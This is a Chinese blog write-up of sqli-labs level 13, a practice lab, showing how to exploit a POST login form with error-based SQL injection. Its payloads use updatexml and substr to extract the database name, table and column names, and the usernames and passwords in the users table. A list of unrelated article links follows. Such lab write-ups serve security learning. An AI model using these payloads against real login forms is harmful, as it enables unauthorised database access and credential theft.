当前位置: 首页 > article >正文

sqli-labs关卡记录13

同样还是post型,按照常规的方法,抓包,找到注入点:

updatexml(1,concat(0x7e,substr((select group_concat(username,password)from users),31,30),0x7e),1)--+

这里找到注入点,闭合方式为')类型,然后就是判断列数,发现显示位:

这里我们会发现,当我们执行正确的语句,页面没有任何变化,于是就可以判定这是报错注入,下面就是使用报错注入,来完成后续操作。

uname=1')and updatexml(1,concat(0x7e,database(),0x7e),1)--+&passwd=1&submit=Submit

这里就看到,拿到了数据库名,后续操作就是和正常注入类似:

uname=1')and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+&passwd=1&submit=Submit拿到该数据库下有多少表

uname=1')and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1)--+&passwd=1&submit=Submit拿到users表的列名信息

这里就可以看到,获取了相关信息,但是需要注意,这里一次性只能最多输出32个字符,因此就要引入substr函数。

uname=1')and updatexml(1,concat(0x7e,substr((select group_concat(username,password) from users),1,30),0x7e),1)--+&passwd=1&submit=Submit

uname=1')and updatexml(1,concat(0x7e,substr((select group_concat(username,password) from users),31,30),0x7e),1)--+&passwd=1&submit=Submit

这里就简单的获取了前60个字符。


http://www.kler.cn/a/452347.html

相关文章:

  • Java中以某字符串开头且忽略大小写字母如何实现【正则表达式(Regex)】
  • 数字IC后端设计实现十大精华主题分享
  • LSTM-SVM时序预测 | Matlab基于LSTM-SVM基于长短期记忆神经网络-支持向量机时间序列预测
  • SOTA简繁中文拼写检查工具:FASPell Chinese Spell Checker 论文
  • Unity中LineRenderer使用MeshCollider方法参考
  • 突发!GitLab将停止对中国区用户提供GitLab.com账号服务
  • 代码随想录算法训练营第51期第28天 | 122. 买卖股票的最佳时机 II、55. 跳跃游戏、45. 跳跃游戏 II、1005.K次取反后最大化的数组和
  • 实现用户登录系统的前后端开发
  • 第4章 函数
  • mysql主从同步延迟原因分析
  • 当代体育科技杂志当代体育科技杂志社当代体育科技编辑部2024年第33期目录
  • 【Java-tesseract】OCR图片文本识别
  • 微调 BERT:实现抽取式问答
  • 4G云网络广播系统
  • 替换 Docker.io 的 Harbor 安全部署指南:域名与 IP 双支持的镜像管理解决方案
  • 湖南引力:低代码助力实现智慧养老管理系统
  • Ubuntu重命名默认账户
  • YoloV9改策略:卷积改进|SAC,提升模型对小目标和遮挡目标的检测性能|即插即用
  • 操作系统课程设计
  • 通过opencv加载、保存视频
  • React 脚手架使用指南
  • mac系统升级后Homebrew:Mac os 使用brew工具时报错No remote ‘origin‘
  • linux-21 目录管理(一)mkdir命令,创建空目录
  • 【KV存储(3)】KV引擎详细设计
  • 使用openvino加速部署paddleocr文本检测模型(C++版)
  • 【Kubernetes 指南】基础入门——Kubernetes 基本概念(二)